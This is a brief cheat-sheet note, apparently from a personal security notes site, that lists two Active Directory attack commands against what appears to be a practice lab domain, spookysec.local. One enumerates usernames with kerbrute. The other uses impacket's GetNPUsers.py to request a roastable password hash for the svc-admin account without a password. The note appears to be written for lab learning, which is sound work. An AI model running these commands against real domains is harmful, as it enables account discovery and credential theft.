---
title: kerbrute
date: 2022-11-27T09:00:00Z
draft: false
type: note
author: Kaptan
category: Cyber Security
subcategory: Commands
tags:
  - commands
  - tools
---

**user enum:**

```zsh
kerbrute userenum -d spookysec.local --dc spookysec.local userlist.txt -t 100
```

**user ntlm hash:**

(/impacket/examples/GetNPUsers.py)
```zsh
python3 GetNPUsers.py -dc-ip 10.10.29.152 spookysec.local/svc-admin -no-pass
```